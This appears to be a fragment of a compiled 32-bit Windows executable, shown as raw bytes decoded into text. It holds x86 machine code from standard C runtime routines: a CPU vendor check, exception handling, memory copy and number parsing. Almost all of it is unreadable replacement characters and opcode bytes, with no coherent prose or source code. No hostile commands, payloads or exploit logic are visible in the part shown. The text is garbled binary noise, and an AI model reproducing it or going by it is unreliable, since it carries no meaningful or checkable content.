�M���M����K4��9E��  h*�������B���h *�������2���h8*�������"���hP*���������hp*���������h�*��4��������h�*��L��������h�*��d��������h�*��|��������h�*����������������������|����|�����d����q�����L����f�����4����[���������P���������E����������:����������/����������$���������U�R����q3��jj ��t���P����̂���E�jBj ������Q�M�趂�����T����h +��������������2��3��u���p�U��E�+E���p����������������������t�������h���MQh8�h���U$Rh���EP��pQ��pRh8��EPh��MQh����pR��pP��\���Q������D�E�j �M��S����\���������d���Rh���2��������u	�E�   ��E�    ��p3�p9M�|	�E�   ��E�    ��p��p��9U�t
����YR��� ��1����Ys1��L���PhH���D���Q�����P� ��?����D����i��������*���U��U��M��q����M��i�����|����^�����d����3�����L����(����E�^��]Ãa ���a �AH1����U��QQ�EV��E��E��E��V�t��" �b RP�  YY��^�� U��V�u��������h1��^]� U��QV�u��u������h1��^�� U��V�u�������\1��^]� U��V�u�������t1��^]� U��QV�u��u��I����t1��^�� �A�t�P��  Y�U��V��F�t�P��  �EYt
jV�~   YY��^]� U����M��u�=���hP��E�P�  �U����M��u�r���h���E�P�  �U����u��  Y��t�u蔉  Y��t�]Ã}��  ��  鄉  U���u�����Y]�U��EV�H<��A�Q��Ak�(�;�t�M;Jr
�BB;�r��(;�u�3�^]Ë���V�  ��t d�   �8��P�;�t3�������u�2�^ð^��e  ��t�  ��Q  P舐  Y��t2���x�  ��j ��   ��Y����(  ��u2���ϖ  ��u�(  ����ǖ  �(  ��U����  ��u�}u�u�MP�u�h��U�u�u膈  YY]���  ��th@����  Y���  �����  �j 虖  Y�M(  U��} u�<��  ��'  ��u2�]���  ��u
j �(  Y��]�U��==� t�]�V�u��t��ub�F  ��t&��u"h@��t�  Y��uhL��e�  Y��t+2��0����@��D��H��L��P��T��=��^]�j��  �jhȿ�  �e� �MZ  f9   u]�<  ��   PE  uL�  f9�  u>�E�   +�PQ����YY��t'�x$ |!�E��������E� 3Ɂ8  �����Ëe��E�����2��M�d�    Y_^[��U���E  ��t�} u	3��8��]�U��=<� t�} u�u�ؔ  �u�&  YY�]�U��=@���uu���  �h@��Q�  Y��Y���#E]�U���u�������Y���H]�U���EV����1t
jV����YY��^]� ������Q�L$+����#ȋ�% ���;�r
��Y�� �$�-   � ��U��E�� t3��t ��t��t3�@�0�<������������u�u�   Y��} ����P�  Y]� jh��F  j �k���Y����   �b����E��]�e� �=4� ��   �4�   ������tM�'  ��  ��  h�ph|p��  YY��u)�?�����t hxph p蚓  YY�4�   2ۈ]��E������=   ��uC��  ���> tV����Y��t�uj�u�6���h����X�3�@��]��u������Y�3��M�d�    Y_^[��j�%  �jh��?  �X���3��iH�X�3�G�}�e� �N����E��}��=4�uk������  �R  �%4� �e� �9   j �u����YY�����#��u��E������"   �ƋM�d�    Y_^[�Ë}��u��.���YËu�������j�u  �jh0��  �}��u9=X�3���   �e� ��t
��t�]�1�]SW�u��   ���u����   SW�u�������u����   SW�u�y�����u��u'��u#SP�u�y��������P����YSV�u�j   ��t��uHSW�u�B������u��t5SW�u�D   ���$�M�Q�0h�;�u�u�u�}�����Ëe�3��u��E������ƋM�d�    Y_^[��U��V�5�1��u3�@��u���u�u�h���^]� U��}u��  �u�u�u������]� U����M�����h��E�P�W  �U����M��w���ht��E�P�:  �U��%\� ��$���j
�d�����  �e� 3�SVW3ɍ}�S���[��w�O3ɉW�E܋}�E��ntel�E�5ineI�E��E�5Genu�E�3�@S���[�]܉�E��s�E��K�SuC�E�%�?�=� t#=` t=p t=P t=` t=p u�=`����=`���=`��M�jX�M�9E�|/3�S���[�]܉�s�K�M��S�]���   t���=`���]�����\�   �����   ��   ���\�   �����   ty��   tq3�ЉE�U��E�M�j^#�;�uW������\�   ����� t;�� �\�   ����  �#�;�u�E��   �M�#�;�u���@�5\�_^[3���3�@�3�9P����U���$  Sj�d���t�M�)j��   �$�  ������j P��  ����������������������������|�����x���f������f������f��t���f��p���f��l���f��h�����������E�������E������ǅ����  �@�jP�������E�j P�F  �E���E�  @�E�   �E��h�j �X��ۍE��E�������ۉE����p��E�P�l���u��uj�   Y[�Ã%d� �����h`bd�5    �D$�l$�l$+�SVW���1E�3�P�e��u��E��E������E��E�d�    ��  U����e� �E�e� P�|��E�3E�E��(�1E�� �1E��E�P�x��E��M�3E�3E�3��Ë��VW�N�@��  ��;�t��u&������;�u�O�@����u
G  ��ȉ����_���^�hp�����hp�� "  Yøx�ø���������H�$�H������H��HøL��SV����;�sW�>��t
���h��׃�;�r�_^[�SV����;�sW�>��t
���h��׃�;�r�_^[�;��u��(   U��j �p��u�l�h	 ���P���]�U���$  j�d���tjY�)����������|��5x��=t�f���f���f�p�f�l�f�%h�f�-d������E ����E����E������������  ���������	 ����   ���   jXk� ǀ��   jXk� ����L�jX�� ����L�h�1�������U��W�}� tH���tB�Q�A��u�+�SV�YS�|  ��Y��t�7SV�}�  �E�΃�3���@V�d|  Y^[��M���A _]�U��V�u�~ t�6�=|  Y�& �F ^]�U����ESW�}� ��E���t-�t���VQ��p �΋x�h���^��t
�t� @��E��E��E�Pjjhcsm��]�}����_[�� U��Q�E�MSV�XW�x�׉U����x-k���Ë]���t<��J9X�};~���u�u�I�U���y�B;�w;�w�E�M_�p^��P�H[��贊  �U����e� �E�3���M�E��E�E�E@�E�sH�M��E�d�    �E�E�d�    �uQ�u�U-  �ȋE�d�    ����U���@S�}#  u��G�M�3�@��   �e� �E�I����M�3��EȋE�E̋E�EЋE�EԋE �E؃e� �e� �e� �e܉m�d�    �E��E�d�    �E�0�F Y�M��E�   �E�E�E�E��  �@�E��h��E�M��U�E��E��E�P�E�0�U�YY�e� �}� td�    ��]��d�    �	�E�d�    �E�[��U��QS�E���E�d�    �d�    �E�]�m��c���[�� U��QQSVWd�5    �u��E�JHj �u�u��u����E�@����M�Ad�=    �]��;d�    _^[�� U��V��u�N3�����j V�v�vj �u�v�u�0&  �� ^]�U��MV�u��f  �H$�N�[  �p$��^]�U��V�J  �u;p$u�v�:  �p$^]��/  �H$���;�t�H���t	��F����A�  �U��QS��E�H3M������E�@��ft�E�@$   3�@�l�jj�E�p�E�p�E�pj �u�E�p�u�g%  �� �E�x$ u�u�u����j j j j j �E�Ph#  �d������E��]�c�k ��3�@[��U���SVW��E�3�PPP�u��u�u�u�u��$  �� �E�_^[�E���]��������������WV�t$�L$�|$�����;�v;���  �� ��  ���   s�%����  ��  �%`�s	�D$^_Ë�3Ʃ   u�%����  �%`� ��  ��   ��  ��   ��  ��s����v����s�~���vf����   te����   foN�v��fo^��0foF fon0�v0��0fo�f:�ffo�f:�fGfo�f:�fo �0s��v�   foN��v��I fo^��0foF fon0�v0��0fo�f:�ffo�f:�fGfo�f:�fo �0s��v�VfoN��v���fo^��0foF fon0�v0��0fo�f:�ffo�f:�fGfo�f:�fo �0s��v��r�o���vf�����s����v����s�~���vf����TL����   t��I������   u�у� ��  �����$�TL�$�dL�dLlLxL�L�D$^_Ð���D$^_Ð���F�G�D$^_ÍI ���F�G�F�G�D$^_Ð�4�<�� �Q  �%����   ��   t�׃�+ʊF��G�NO��u�� �  ��������������$� M�MM(M<M�D$^_Ð�F�G�D$^_ÍI �F�G�F�G�D$^_Ð�F�G�F�G�F�G�D$^_���   tINO����   u���   rh��   ��   �o�oN�oV �o^0�of@�onP�ov`�o~p��O�W �_0�g@�oP�w`�p��   ������u��� r#�� �� �o�oN��O�� ������u�������t��������������u��t��������u�D$^_����̋ƃ�����   �у���tf��$    ��fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fp���   ���   Ju���t_������t!��    �o�oN��O�v � Ju��t0����t��������u�ȃ�t��FGIu���$    �I �D$^_Í�$    ���   +�+�Q�ȃ�t	��FGIu���t���v�Hu�Y����������������̋L$�D$�׋|$���<  i��� ��   ���   ��   �%`�s	�D$����%����   fn�fp� ������+ρ��   vL��$    ��$    �ffGfG fG0fG@fGPfG`fGp���   ��   �� ���u���%��s>fn�fp� �� r��G�� �� �� s���   tb�|���G�D$�����   t�G����   u���   t�����������t ��$    ��    ��G����������u�D$��������̃=\�r_�D$�����fn��p� ۋT$�   ���#���+��o
f��ft�ft�f��f��#�u����������f~�3�:E��3��D$S�����T$��   t�
��:�tY��tQ��   u��W����V؋
����~����3���������3�3ƃ��� �u!% �t�% u��   �u�^_[3�ÍB�[ËB�:�t6��t�:�t'��t���:�t��t�:�t��t��^_�B�[ÍB�^_[ÍB�^_[ÍB�^_[�U��S�]��V�� �q  ���Z  ���7  ���  �U����  �uW�� ��  �;tT���+�u�~�B+�u�~�B+�t3Ʌ����M������N�B+�t3������E�������.  �F;BtU���B+�u�~�B+�u�~�B+�t3Ʌ����M������N�B+�t3������E��������  �F;BtU���B+�u�~	�B	+�u�~
�B
+�t3Ʌ����M������N�B+�t3������E�������t  �F;BtU���B+�u�~�B+�u�~�B+�t3Ʌ����M������N�B+�t3������E�������  �F;BtV�B�~+�u�~�B+�u�~�B+�t3Ʌ����M������N�B+�t3������E��������  �F;BtU���B+�u�~�B+�u�~�B+�t3Ʌ����M������N�B+�t3������E�������\  �F;BtU���B+�u�~�B+�u�~�B+�t3Ʌ����M������N�B+�t3������E��������  �F;BtU���B+�u�~�B+�u�~�B+�t3Ʌ����M������N�B+�t3������E��������  j Y+���;��	������$��`�F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������)  �F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E��������  �F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������o  �F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������  �F�;B�tV�B��~�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E��������   �F�;B�tQ���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������u[�F�;B�tQ���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������u3ɋ�_�  �F�;B�tQ���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������u��F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������B����F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������+����F�;B�tV�B��~�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������p����B��N�+��`���3������E�����M����F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������6����F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������|����F�;B�tV�B��~�+�u�B��~�+�u�B��~�+�t3Ʌ����M������B��N�+�t3������E�����������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�����������f�F�f;B�������  �F�;B�tV�B��~�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������P����F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������9����F�;B�tV�B��~�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E������������F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������~����F�;B�tU���B�+�u�~��B�+�u�~��B�+�t3Ʌ����M������N��B�+�t3������E�������!����~��B�+�u�B��~�+������3Ʌ����M����������M��1+�u�q�B+�u�q�B+�t3Ʌ����M������I�B+�t3������E�������V�M�u��+�u�Q�F+�t3Ʌ���I�F뾋M�u��+�u��I�F뤋E��E� �3�^[]Ë��WZZ	]�_oW�Y�\L_W�YN\�^�VBY�[�^[V�X�[4^�U�X7[�]�U+X�Zz]DU�W}Z]��������̋D$S��tR�T$3ۊ\$��   t�
��2�tr��t2��   u��rW����ߋ�����_��t�
��2�t@��u�[Ã�r�
3˿���~����3σ��� �t��J�2�t#2�t��2�t2�t��_�B�[ÍB�_[ÍB�_[ÍB�_[���  ��u2����  ��u�!  ����H  �����j ��  Y��U��} u
��  ��  �]���  �����������������U��V�uW�}����t�N�38������F�N�38_^]������������������U���S�]VW�E� �3�E�   �B�  ��]�C�s3��VP�u��E������u��  �E���{�@fuZ�E�E�E�E�C����ti�M��G�G�����H�E��t���9  ��M���xH��M������uɄ�t.� �E�    ����th��V��������\  V�u���������E�_^[��]ËE�8csm�u8�=�1 t/h�1�8�  ����t�5�1��j�u�h��֋u����E�M����  �E9xth��V�׋���  �EV�u��X�s����M���֋I�  �jhP�������E��t~�8csm�uv�xup�x �t�x!�t	�x"�uU�H��tN�Q��t)�e� R�p�J   �E������1�u�u��C   YYËe����t�@���t�Q�p���h��֋M�d�    Y_^[��U��M�U]� U��} t2VW�}�7�>csm�u!�~u�~ �t�~!�t�~"�t_^3�]��k  �p�w�`  �p��k  �U���O  �@$��t�M9t�@��u�3�@]�3�]�U��M�UV��q�x�I��
��^]�U��V�uW�>�?RCC�t�?MOC�t
�?csm�t���   �x ~��   �H_3�^]���   �x�v�   �p�Vk  ��Pk  U��E�M;�u3�]Ã����:u��t�P:Qu������u������]�U���u�����tV�0P�4\  ��Y��u�^]�U��E��t=��tP�\  Y]� U�졠����t'V�u��uP��  ���Yj P�  YYV����^]��	   ���(k  Ã=���u3��SW����5�����  ��Y���t��uYj��5����  YY��u3��BVj(j�k  ��YY��tV�5���  YY��u3�S�5���  YY���3�V�F[  Y^W���_��[�h�e�  ���Y���u2��h��P�M  YY��u�   ��á�����tP�  ����Y��jh��{���3ۋE�H���
  8Y�  �P��u9��   ��u��x���]��}��y �t����E��t���h��U����E��t�H����   ����   ��GPQ�7�t=�x ��   ����   �w�pV�4������uV�> tQ�GP�6����YY��@�H9_u#��tZ��tV�w�GPQ�����YYPV����������t7��t3�j [��C�]��E��������3�@Ëe��3��M�d�    Y_^[���
i  �jh8��=����U�M�: }����yz�e� �uVRQ�]S��������t!��u4�FP�s�V���YYjP�vW�y  ��FP�s�:���YYP�vW�O  �E������M�d�    Y_^[��3�@Ëe��qh  �U��}  S�]VW�}t�u SW�u�H������E,��u���uP�����u$�6�u�uW�d	  �F@P�uW�  h   �u(�s�u�uW�u��  ��8��tWP����_^[]�U���dSVW�}3�W�u�E��u�E��M  �ȃ��M�����s  ;O�j  �]�;csm���   �{��   �{ �t�{!�t�{"���   3�9s��   �9���9p��  �+����X�#����E��@�E�����  �;csm�u*�{u$�{ �t�{!�t	�{"�u	9s��  �����9ptb������@�E�������u�S�p�	  YY��u@�}�97�0  �Gh���L�  ���  �E���@�E�;�  �ӋU�U���U��M�3��}ЉEԁ;csm���  �{��  �{ �t�{!�t�{"���  �u$9G�  �u �E�W�uQP�E�P�!����Uă��E��E؉U�;U���   k��M� �}�j�p�E��Y�9E���   ;E���   3ɉM�9M���   �C�@����E��E��U܉E���}������}����~&�s�E��7P�  ����u"N�����M��E�U�A���M��E�;M�u��+�u�E��u��u$�u P�7�E�P�u�u�u��uS�������0�U�M�B�E؃��U�M�;U��'����}�u$�} t
jS����YY�%���=!�rl� u�G ���t\�}  uV�G ���t������X������M��H�G�wS�  YY��t]�&9Gv!8E��   �u$�u QW�uR�uS�z   �� �����x uf_^[���d  jS����YY�M��3  hT��E�P������N����X�F����M��H��u�uSV�7���W�u�u�|  W�3  ��P��  �Gd  �U���8S�]�;  ��  VW�����3�9xtFW����������9pt3�;MOC�t+�;RCC�t#�u$�u �u�u�u�uS����������   �E�E�}�9x��   �u P�u�E��uP�E�P�����U����E܉E�U�;U���   k��M�� �}�j�p�E�Y�9E�N;E�I�MԋE��������H��t�y u.� @u)j j�u$�M��u Qj P�u�u�u�uS������U���0�M�B�E���U��M�;U�r�_^[���c  �U��USVW�B��tv�H�9 tn���}t�ua�_3�;�t0�C�:u��t�Y:Xu������u��������t3��+�t�t�E� t�t� t�t3�F���3�@_^[]�U��SVW�u�  Y�9����M3��U�����"�9p u"�:csm�t�:&  �t�#�;�r
�A ��   �Bft&9q��   9u��   Q�u�u�2  ���   9qu�#�=!�r9qu;�rh�A ���t^�:csm�u:�zr49zv/�B�p��t%�E$P�u �uQ�u���u�uR�h��փ� ��u �u�u$Q�u�u�uR������ 3�@_^[]�U��V�u���B�����1��^]� �̃a ���a �A�1��1�U��E��P�AP�R�����Y�Y��]� j<h���`����E�E�e� �]�C��EЋ}�w�E�P�R���YY�E������@�E������@�E������x�����M�H�e� 3�@�E��E��u �u�u�uS��������؉]�e� �   �u��o  YËe��Y����`  �}�G�E�W�u�]S��  ���E��W3ɉM�9Ov:k��]�;D�]~"�}�;D�}k��D@�E��M؋��E��	A�M�;Or�PWj S�V  ��3ۉ]�!]��}�E������E�    �   �ËM�d�    Y_^[�Ë}�]�EЋM�A��u��K���Y�����MȉH�����MĉH�?csm�uK�uE� �t�!�t	�"�u*�}� u$��t �w�����Y��t�}� ����PW�����YY�j�Vh���  �"����x u�e� �  �����Mj j �H�����/_  ������U��E� �8csm�u6�xu0�x �t�x!�t	�x"�u�x u����3�A�H ��]�3�]�U��j��u�u�u�   ��]�jhp�������u�u�u�*  �����u��k����@�e� ;uth�����   �};w��   �G���M��E�   �|� t0QW�u��  ��h  �u�G�t��7  ��u������YËe�e� �u��u���E������'   ;uu6V�u�u�  ���M�d�    Y_^[�Ëu������x ~�����H���]  �U���SV�uW����   �>3ۅ�~q�E�Ӊ]��@�@����M��E�ȋE��M�E���~;�FE�U�r�1P�u�������u�E��M�H���E����M�E�����U��E���U���u�_^��[���F]  �U���u�M�U]� U���u�M�u�U]� U��E�@]��������U���SQ�E���E��EU�u�M�m��  VW��_^��]�MU���   u�   Q�{  ]Y[�� U��h�=�Btd�   �E���   ;Ar;AvjY�)]�VW���3�j h�  W�  ����t���������r۰��   2�_^�V�5����t k�W����W����������u�_�^����������SVW�T$�D$�L$URPQQh�ud�5    ���3ĉD$d�%    �D$0�X�L$,3�p����F   �T$4���t;��5   �4v�\���H�{ �����h  �C�a  �   �C�t  ����d�    ��_^[�̋L$�A   �   t3�D$�H3�����U�h�p�p�p�.�����]�D$�T$��   �����������UVWS��3�3�3�3�3���[_^]���������̋���j��  3�3�3�3�3����������U��SVWj RhuvQ���_^[]�������U�l$RQ�t$������]� U��QSVW�}�o���(��3��t���uv�V��P;h   j P�E��������uG�����Wu(�u�jh�;V�&[  ����tj j V�������u������;}u�3�_^[�ËƇ��tV�������U��EVW�<�4�����;�t+��u)�u�u�?���YY��t�uP�����t�ȇ��73�_^]�U��Vh <h�;h <j ����������t�u���h���^]�^]�%��U��Vh<h<h<j�b��������u��t���h�������^]�U��Vh$<h<h$<j�'��������u��t���h�������^]�U��Vh8<h0<h8<j����������u�u��t���h�������^]�U��VhL<hD<hL<j����������t�u���u�u�h�����u�u���^]�V�e����p��t
���h�����W  �U��E�M�x�   �A]ËA]�U��E�M�H]���������SQ����   ����SQ����L$�K�C�kUQPXY]Y[� ���Ë�U���3��M�B��B�B�B$��t��I�9��u�������B�J�B��]� ��VW���u	���P  �� t�w�   �p�$ t�w ���u   �p_^Ë�V��~ u����f P�F���3�^ËF^Ë�U��QVW������ �E�u3��G�G��GP�E�P�]  YY�u����7���_��^�Ë�V��> u	������t�^��W  ̋�U���(  ���3ŉE��}�Wt	�u����YjP������j P�����h�  ��0���j P���������������������0���������������������������������������������f������f������f������f������f������f��������������E�������E������ǅ0���  �@��������E�������E�������E�������h�j ���p�������P�l���u��u�}�t	�u����Y�M�3�_�����Ë�U��E�L�]Ë�U���(�M�j �����E�P�u�u�u�u�u�   ���M������Ë�U��VW�}���u��������t*��\  ��t �u�u�u�u�u���h��փ�_^]Ë������u����u�4�L����u35���u���u��u��.   �3�PPPPP�@�����Ë�V3�VVVVV�-�����VVVVV�   �j�d���tjY�)Vj� �Vj������V��P���^Ë�U��M�A=   w�E�H#E]�3�]��������������̋�U��Q�=�� V�uW�~u��   wd���_�p%  ^��]��X  �HL�M��M�QP��\  �E�����   w� _�p%  ^��]Ãx~j h  V��[  ��_^��]�_3�^��]Ë�U��SW���M�G �_��t��I��=�� u��������K�AV�"X  ��wSP�HL��HH��b\  V�7�\  �����P  ^�u����P  �G��_[]� ��U������S�];���   �u�M��\�����   s)�}� �E��ˋ��   ���   �E胠P  ��   �U�3��E��z~'�����E��ȋW3�f9<H_}�E�3�j�E��]�X��]  3�� *   3��U�@�]��M�jf�M��M��M��rjQP�E�Ph   ���   �E�P��^  ��$��u����U���t	�E���Ѐ}� t
�M胡P  ���[�Ë�U��=�� tj �u�����YY����M�A���w�� ��]��V  iH�C ��Þ& �H�����  ��Ë�U���E�M�3�����  ���A]Ë�U��M�E���I����  �ȋE%�� ȋE�3�]Ë�U���E3�MV�u����  �����  ����E��%�� ��E�p�3�^]Ë�U���V�u��u�[  �    �`������=�u�M��m�����E�PQQ���]�` �0�E�P�[   �E���}� t
�E䃠P  �^�Ë�U��QQ�E�E��E�P�u�E��  YY�Ë�U��QQ�E�E��E�P�u�E��*  YY�Ë�U���  ���3ŉE��EV�u��t��u!��Z  �    �����M��t�E�3�@�.������Q�MQP�*   V������QP�C  �U����t�M�
�M�3�^�,����Ë�U���,SV�u��W�/  ����  ��}�E��uԊ@��E��E؍E��E����@�W��jP�M��/  ����u�U�M���  ��-�U����t��+u
��@��M���I�X  ��i�O  ��N�4  ��n�+  3ۈ]���0u4���z�E��><xt<Xt�u�����.  �M����G�E���M��U��E����E��Ѐ�0u���@��M���0t�3���8E���H����	�E��,0<	w����0�#��,a<w����W���,A<w����7����;E�w�;U�t�B�G�@��M�뱉}�}�U������   � :��   ��@�ʉ�U�;}�u��0u�U���J@�M����0t�U�]�U��,0<	w����0�#��,a<w����W���,A<w����7����;�w�;�t�G��@��M��3ۄ�u!�M��:  ����  �}� ��  j��  �u����f-  ��E���P��ÈM���Et��Pt
��et
��pu
�E���E�4����   �*�B�m��Չ�U���+t�̀�-u
�@��ʈU����0u���@��U���0t�ʊ�,0<	w����0���,a<w����W���,A<w+����7��
s k�
�؁�P  ��@��U�밻Q  ��0|��9��������,a<w��������,A<w����Ƀ�
s��@��ʈU�뽀}�-u�ۄ�u�M���  ����   ��@��U��u����*,  �u����O�? u	;�u�������P  =�����;�|0�U�3�����H��@�E�؁�P  ;�|�E+Ή�H���,j�'j	�#�u��E�VP��   ����u��E�VP�
   ��jX_^[�Ë�U���S�]�EV�uW�3��u��ω]�E�:��Gt:��Gu\��@A��U����u��u����S+  ��E�@��:��Gt:��Gu0��@G��M����u��u����+  jX_^[�ÍM��  j��M��  3Ʉ�����   �׋�U���V�u�EW�}3ɉu��}�E��:��Gt:��GuG��@A��U����u��u����*  ��E�@����(t&�M��;  �����������   �M��!  j�|�VW�@���   YY��t���P�K*  j�WVW�U   �YY��tR���0*  j�<��)t5��t���,0<	v��,a<v��,A<v	��_�p�����@��ш��)u�jX_^�Ë�U��SV�u3�W�}�ʊ:��Gt:��Gu��@A����u�_^��[]Ë�U��SV�u3�W�}�ʊ:��Gt:��Gu��@A����u�_^��[]Ë�U��E��	��   �$���u�u�����YY]��u�u������E3�8�  �����E�  �H3�]ËE3�8�  ������  ��ڋE3�8�  �E��������������E�u��  P����YY뭋E�  �@  ��랋E�  �` 3�@]ËE3�j8�  �����E�  �HX]ËE3�j8�  ������  ��ٍI $�3�@�^�w�������ˇ���V��F�� P�<(  �F�  �F�^� ��Ày t��j h�  h0Fh�Fh�F�����̀y u��j h�  h0FhGhlG�����̋�U��M�y t�������E���  ��! �A]������M����  ��]Ë�U���$SV�u3�W�};�w���w�ǉ]�t@�����Ɖ]�t@��Ã� �M3ҊI�ɈM��M��J����+�3�+ʉU�8E��M���H%�  ���E�;��n  3�8E���H%�������;��=  �E�M�H��ىE�M����  �؉E���@��   �H�3�3�@�8�  �E�ʃ���M�E����3��M�@�M�3���  #��E�#��u�]��ϋ�#M�#E��t��M���ˈ]�8]t�E��U�#�#��u�È]����E���u��t5��S  ��t=   t=   u�]����]�8]�t8]�u8]�t��M��ǋ���  �����Ù�����t)�M�K!  ;��t  w;��j  �]+]�+]�K�^  �u�u�%  YYj�/  �M��2  ���%  �ډU��@r	������   3��J�@3���  �M�E܃���U�����E�3��U�@3����  #��E�#��u�]��E܋M�#�#��t��U���ӈ]�8]t�ϋ�#M�#E��u�È]����E���u��t5�R  ��t=   t=   u�]����]�8]�t8]�u8]�t��M�ǋ��w�  �����Ù��M��$  ;�rOw;�vI�M3��]�����C8A��H%�  ��;�~*�u�u�����YYjX_^[��~�M�֋����  ����]��M��  #�#�E�Ȁx t�G���PVWS�u�b�����Y���PVWS�u������릋�U��� 3�S�]VW�}8S��J������@w5�u�> v�>�Nv�v�3�3��E4S��P�u3��R�� VP�+  �������M�w������E�E�\��]���]��]��uO�M�}�ʉM�3�L��M��M�� ���M��t�P�: �R����"ȃ�u�M�S�u��u�u�W�u��   3�C����H�E�j@X+��E��E���M��3҉E��E��I���  �M��E��E�U�3ҋD�#E���  E��E�U��Ћ}�3ҋM�#���  �M�ȉM�U��} u�}�t2ۈ]��t�M���9 �I����"؈]��u�M��u�U��u��u�u�RQ�#�����_^[�Ë�U��M�y t�~������E����! �A]������M���]Ë�U���,  ���3ŉE��M3��USV8A���������H����������������W��y3ۋB��;�r��+ٍz��������������Z�������3�+É�����������3�3���������������,���;��  �؋��������}
  j
3�Y�������ʉ��������
  ��&vj&X��nE�4�oE����������W�1������������j P�m�������P��������lE��h<P�������P�ú��������3�@��������;��  ����������  3�P��������,���������Ph�  ��0���P�!  ����,�����������������!	  ��������	�7  ����   ������3�3�� ʚ;���0���������0����� F��;�u䋽������,�����tL��ss���0�����,���@��,����1������ ��������,��� j P��0���h�  P� !  ��,���������������������   3҅�t$3���0����B����,�����������;�u���tb��ss���0�����,���C��������,����C������ ��������,��� j P��0���h�  P�p   ��,������������
���������3�3���������k�
�AG������������;��������������  ��3�j
Y�������ʉ��������m  ��&vj&X��nE�4�oE����������W�1������������j P��������P��������lE��h<P�������P�^���������3�@��������;���   ��������u3���������,����  ;���  ����  3�3������0�������0����� G��;�u��tO��,�����ss���0�����,���C��,����43ۍ�����������SP��0�����,���h�  P��  ���  ��,�����  ;���   ��0���������  P��������,���P��0���SP�  ��3���uP��������,���������PS�  ��,���@������;���  ����  3�3������0�������0����� F��;�u�����;ˍ�������r��0�����������t��������0�����������������������ˉ�����������3�3�����������   �<� u;���   ������� �G��������   3�3ۋ�������9�������   ��stR;�u������� �GÉ��������������������$�������� �������������� CF������;�����u���tH����������st4;�u�# �F��������3�F���
������
���������������uǋ�������s��   ������G;��	�����,�����P������Ph�  ��0���P��  ���,�������������t1������+��������������������������   �<�F��uL������ ��������,��� j P��0���h�  P�X  ��,������������y3ۍ������������3�����������t[��tW3ɋ�3������0�������0����� F��;�u䋅,�����t���s�p������0�����,���@��������,��������������������   3҅�t(3���0����B����,�����������;�u���� �����ss���0�����,���C��������,�������������� ��������,��� j P��0���h�  P�F  ��,�������������������������;��������w���3�3������0�������0����� F��;�u��   ���0�����,���C��,����1���;���   ��0���������  P��������,���P��0���SP�  ��3���uP��������,���������PS�������,���@������;�������������3�3������0�������0����� F��;�u���������,�����s�=���3ۍ�����SP��0���������h�  P��,����  �Ã���,����R���;ˍ�������r��0�����������t��������0�����������������������ˉ�����������3�3�����������   �<� u;���   ������� �G��������   3�3ۋ�������9�������   ��st];�u������� �G��������������������$��������� É�������������� �ڋ�����BF������;�����u���t:����������st&;�u�" �F�������ʋ�F��3��������uՋ�������s��   ������G;�������,�����P������P��0���h�  P�  �����,�������������   ������+������������������������tE�<�F����   3�P��������,���������P��0���h�  P�  ����,�������������   3��  3�P��������,���������P��0���h�  P��  ��2��E��������� ��,��� j �d��t���t�3�3������0�������0����� F��;�u���q�����,�����ss���0�����,���C��,����S���3���������,���P������P��0���h�  P�7  ����������������  P����YYjX��  ���,��������� ��t@�3��K���ȉ�����;�������  ���������w  ������3�3���\���3ɉ�������������;������%  ��	�  ����   3ɾ ʚ;3����`���������`����� G��;�u䋵������tK��\�����ss���`�����\���C��\����03�P��������\���������P��`���h�  P�  ����\�����������tp3Ʌ�t��3���`�����\����A��;�u��tL��ss���`�����\���C��\����1������ ��������\��� j P��`���h�  P�  ��\�����3�3��k�
�AG������������;��������������  ��3�j
